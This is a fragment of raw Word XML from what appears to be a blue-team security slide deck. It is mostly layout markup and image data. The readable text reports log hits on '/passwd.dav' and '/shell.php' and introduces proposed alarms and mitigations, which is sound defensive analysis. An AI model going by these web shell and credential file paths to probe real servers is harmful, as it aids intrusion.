        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40902C31" w14:textId="7C2A148B" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1262"/>
        </w:tabs>
        <w:spacing w:line="302" w:lineRule="exact"/>
        <w:ind w:hanging="29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4752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="506D6839" wp14:editId="36E7F837">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>306070</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>424180</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8773795" cy="3076575"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="7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3076575"/>
                          <a:chOff x="482" y="668"/>
                          <a:chExt cx="13817" cy="4845"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="79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" y="668"/>
                            <a:ext cx="6800" cy="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1" y="737"/>
                            <a:ext cx="7017" cy="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" y="3096"/>
                            <a:ext cx="6590" cy="2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1" y="3191"/>
                            <a:ext cx="6922" cy="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545BF" id="Group 68" o:spid="_x0000_s1026" style="position:absolute;margin-left:24.1pt;margin-top:33.4pt;width:690.85pt;height:242.25pt;z-index:15754752;mso-position-horizontal-relative:page" coordorigin="482,668" coordsize="13817,48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KAAAAAAAAACEAh9AKYo6AAACOgAAAFQAAAGRycy9tZWRpYS9pbWFnZTQuanBl&#10;Z//Y/+AAEEpGSUYAAQEBANwA3AAA/9sAQwACAQEBAQECAQEBAgICAgIEAwICAgIFBAQDBAYFBgYG&#10;BQYGBgcJCAYHCQcGBggLCAkKCgoKCgYICwwLCgwJCgoK/9sAQwECAgICAgIFAwMFCgcGBwoKCgoK&#10;CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK/8AAEQgBDQQ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">
                <v:shape id="Picture 72" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:482;top:668;width:6800;height:2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">
                  <v:imagedata r:id="rId38" o:title=""/>
                </v:shape>
                <v:shape id="Picture 71" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:7281;top:737;width:7017;height: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">
                  <v:imagedata r:id="rId39" o:title=""/>
                </v:shape>
                <v:shape id="Picture 70" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:691;top:3096;width:6590;height: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">
                  <v:imagedata r:id="rId40" o:title=""/>
                </v:shape>
                <v:shape id="Picture 69" o:spid="_x0000_s1030" type="#_x0000_t75" style="position:absolute;left:7281;top:3191;width:6922;height:1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">
                  <v:imagedata r:id="rId41" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">16 </w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">hits were made to access </w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>passwd.dav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">110 </w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">hits were made to access </w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ﬁles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FC1B21" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63A9BE31" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01F24BBA" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="474FBD97" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59292B57" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B707F26" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45CAA6C7" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6CEF32" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10210EE9" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F45A788" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E38F0AA" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39755E95" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66BA5624" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15877F05" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A20916D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E77B554" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717409DD" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BAB65E4" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49708005" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BEC0F63" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A17456C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CF0ED5" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7778EFF8" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="759B0130" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="568997A1" w14:textId="41170BB9" w:rsidR="00377979" w:rsidRDefault="000A2543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10444101" wp14:editId="6372AB00">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>116205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8595360" cy="10160"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="77" name="Lin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B6B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42D5F4" id="Line 67" o:spid="_x0000_s1026" style="position:absolute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9.15pt" to="698.4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" strokecolor="#a8b6bf">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="778AEBCD" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11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27852264" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D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7186432" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="257E853A" wp14:editId="01C9CEF3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>274319</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>274879</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="8595332" cy="4608635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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32" cy="460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5272D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="443CC2D0" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A0A7AC1" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F142C1C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33ECFA86" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2553C40B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="199499EA" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E15728" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="82" w:line="218" w:lineRule="auto"/>
        <w:ind w:left="3712" w:right="3817" w:firstLine="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">Blue </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">Team </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>Proposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="-107"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>Alarms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="-106"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D99FBB" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ED188B2" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5776049B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659B9662" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE512E8" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1317F0" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="468A1ADE" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B3597D5" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="120E9069" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C6D14D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D5869EB" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:ind w:right="250"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E401EA" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:sectPr w:rsidR="00377979">
          <w:pgSz w:w="14400" w:h="8100" w:orient="landscape"/>
          <w:pgMar w:top="720" w:right="180" w:bottom="0" w:left="280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2A218F" w14:textId="0D485C8A" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:right="2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14976" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="361501B1" wp14:editId="71420861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76" name="Lin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37E69E" id="Line 66" o:spid="_x0000_s1026" style="position:absolute;z-index:-1570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" strokecolor="#595959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5EEEACBB" wp14:editId="5DED4DB1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>457200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>748030</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2688590" cy="534035"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="7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720" y="1178"/>
                          <a:chExt cx="4234" cy="841"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="74" name="Freeform 65"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="720" y="1178"/>
                            <a:ext cx="4234" cy="841"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4954 720"/>
                              <a:gd name="T1" fmla="*/ T0 w 4234"/>
                              <a:gd name="T2" fmla="+- 0 1304 1178"/>
                              <a:gd name="T3" fmla="*/ 1304 h 841"/>
                              <a:gd name="T4" fmla="+- 0 4933 720"/>
                              <a:gd name="T5" fmla="*/ T4 w 4234"/>
                              <a:gd name="T6" fmla="+- 0 1234 1178"/>
                              <a:gd name="T7" fmla="*/ 1234 h 841"/>
                              <a:gd name="T8" fmla="+- 0 4876 720"/>
                              <a:gd name="T9" fmla="*/ T8 w 4234"/>
                              <a:gd name="T10" fmla="+- 0 1188 1178"/>
                              <a:gd name="T11" fmla="*/ 1188 h 841"/>
                              <a:gd name="T12" fmla="+- 0 4828 720"/>
                              <a:gd name="T13" fmla="*/ T12 w 4234"/>
                              <a:gd name="T14" fmla="+- 0 1178 1178"/>
                              <a:gd name="T15" fmla="*/ 1178 h 841"/>
                              <a:gd name="T16" fmla="+- 0 845 720"/>
                              <a:gd name="T17" fmla="*/ T16 w 4234"/>
                              <a:gd name="T18" fmla="+- 0 1178 1178"/>
                              <a:gd name="T19" fmla="*/ 1178 h 841"/>
                              <a:gd name="T20" fmla="+- 0 796 720"/>
                              <a:gd name="T21" fmla="*/ T20 w 4234"/>
                              <a:gd name="T22" fmla="+- 0 1188 1178"/>
                              <a:gd name="T23" fmla="*/ 1188 h 841"/>
                              <a:gd name="T24" fmla="+- 0 757 720"/>
                              <a:gd name="T25" fmla="*/ T24 w 4234"/>
                              <a:gd name="T26" fmla="+- 0 1215 1178"/>
                              <a:gd name="T27" fmla="*/ 1215 h 841"/>
                              <a:gd name="T28" fmla="+- 0 730 720"/>
                              <a:gd name="T29" fmla="*/ T28 w 4234"/>
                              <a:gd name="T30" fmla="+- 0 1255 1178"/>
                              <a:gd name="T31" fmla="*/ 1255 h 841"/>
                              <a:gd name="T32" fmla="+- 0 720 720"/>
                              <a:gd name="T33" fmla="*/ T32 w 4234"/>
                              <a:gd name="T34" fmla="+- 0 1304 1178"/>
                              <a:gd name="T35" fmla="*/ 1304 h 841"/>
                              <a:gd name="T36" fmla="+- 0 720 720"/>
                              <a:gd name="T37" fmla="*/ T36 w 4234"/>
                              <a:gd name="T38" fmla="+- 0 1804 1178"/>
                              <a:gd name="T39" fmla="*/ 1804 h 841"/>
                              <a:gd name="T40" fmla="+- 0 730 720"/>
                              <a:gd name="T41" fmla="*/ T40 w 4234"/>
                              <a:gd name="T42" fmla="+- 0 1853 1178"/>
                              <a:gd name="T43" fmla="*/ 1853 h 841"/>
                              <a:gd name="T44" fmla="+- 0 757 720"/>
                              <a:gd name="T45" fmla="*/ T44 w 4234"/>
                              <a:gd name="T46" fmla="+- 0 1893 1178"/>
                              <a:gd name="T47" fmla="*/ 1893 h 841"/>
                              <a:gd name="T48" fmla="+- 0 796 720"/>
                              <a:gd name="T49" fmla="*/ T48 w 4234"/>
                              <a:gd name="T50" fmla="+- 0 1919 1178"/>
                              <a:gd name="T51" fmla="*/ 1919 h 841"/>
                              <a:gd name="T52" fmla="+- 0 845 720"/>
                              <a:gd name="T53" fmla="*/ T52 w 4234"/>
                              <a:gd name="T54" fmla="+- 0 1929 1178"/>
                              <a:gd name="T55" fmla="*/ 1929 h 841"/>
                              <a:gd name="T56" fmla="+- 0 1014 720"/>
                              <a:gd name="T57" fmla="*/ T56 w 4234"/>
                              <a:gd name="T58" fmla="+- 0 1929 1178"/>
                              <a:gd name="T59" fmla="*/ 1929 h 841"/>
                              <a:gd name="T60" fmla="+- 0 1084 720"/>
                              <a:gd name="T61" fmla="*/ T60 w 4234"/>
                              <a:gd name="T62" fmla="+- 0 2019 1178"/>
                              <a:gd name="T63" fmla="*/ 2019 h 841"/>
                              <a:gd name="T64" fmla="+- 0 1154 720"/>
                              <a:gd name="T65" fmla="*/ T64 w 4234"/>
                              <a:gd name="T66" fmla="+- 0 1929 1178"/>
                              <a:gd name="T67" fmla="*/ 1929 h 841"/>
                              <a:gd name="T68" fmla="+- 0 4828 720"/>
                              <a:gd name="T69" fmla="*/ T68 w 4234"/>
                              <a:gd name="T70" fmla="+- 0 1929 1178"/>
                              <a:gd name="T71" fmla="*/ 1929 h 841"/>
                              <a:gd name="T72" fmla="+- 0 4877 720"/>
                              <a:gd name="T73" fmla="*/ T72 w 4234"/>
                              <a:gd name="T74" fmla="+- 0 1919 1178"/>
                              <a:gd name="T75" fmla="*/ 1919 h 841"/>
                              <a:gd name="T76" fmla="+- 0 4917 720"/>
                              <a:gd name="T77" fmla="*/ T76 w 4234"/>
                              <a:gd name="T78" fmla="+- 0 1893 1178"/>
                              <a:gd name="T79" fmla="*/ 1893 h 841"/>
                              <a:gd name="T80" fmla="+- 0 4944 720"/>
                              <a:gd name="T81" fmla="*/ T80 w 4234"/>
                              <a:gd name="T82" fmla="+- 0 1853 1178"/>
                              <a:gd name="T83" fmla="*/ 1853 h 841"/>
                              <a:gd name="T84" fmla="+- 0 4954 720"/>
                              <a:gd name="T85" fmla="*/ T84 w 4234"/>
                              <a:gd name="T86" fmla="+- 0 1804 1178"/>
                              <a:gd name="T87" fmla="*/ 1804 h 841"/>
                              <a:gd name="T88" fmla="+- 0 4954 720"/>
                              <a:gd name="T89" fmla="*/ T88 w 4234"/>
                              <a:gd name="T90" fmla="+- 0 1304 1178"/>
                              <a:gd name="T91" fmla="*/ 1304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6"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4213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7"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="126"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="626"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="10" y="675"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="37" y="715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294" y="751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="364" y="841"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="434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5"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4224" y="675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5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1178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A4D26" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="86"/>
                                <w:ind w:left="1523" w:right="1525"/>
                                <w:jc w:val="center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Alarm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EACBB" id="Group 63" o:spid="_x0000_s1066" style="position:absolute;left:0;text-align:left;margin-left:36pt;margin-top:58.9pt;width:211.7pt;height:42.05pt;z-index:-15700480;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="720,1178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">
                <v:shape id="Freeform 65" o:spid="_x0000_s1067" style="position:absolute;left:720;top:1178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" path="m4234,126l4213,56,4156,10,4108,,125,,76,10,37,37,10,77,,126,,626r10,49l37,715r39,26l125,751r169,l364,841r70,-90l4108,751r49,-10l4197,715r27,-40l4234,626r,-500xe" fillcolor="#3d85c6" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4234,1304;4213,1234;4156,1188;4108,1178;125,1178;76,1188;37,1215;10,1255;0,1304;0,1804;10,1853;37,1893;76,1919;125,1929;294,1929;364,2019;434,1929;4108,1929;4157,1919;4197,1893;4224,1853;4234,1804;4234,1304" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 64" o:spid="_x0000_s1068" type="#_x0000_t202" style="position:absolute;left:720;top:1178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2B9A4D26" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="86"/>
                          <w:ind w:left="1523" w:right="1525"/>
                          <w:jc w:val="center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Alarm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05657314" wp14:editId="6140385C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4936490</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>750570</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2688590" cy="534035"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="7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7774" y="1182"/>
                          <a:chExt cx="4234" cy="841"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="71" name="Freeform 62"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
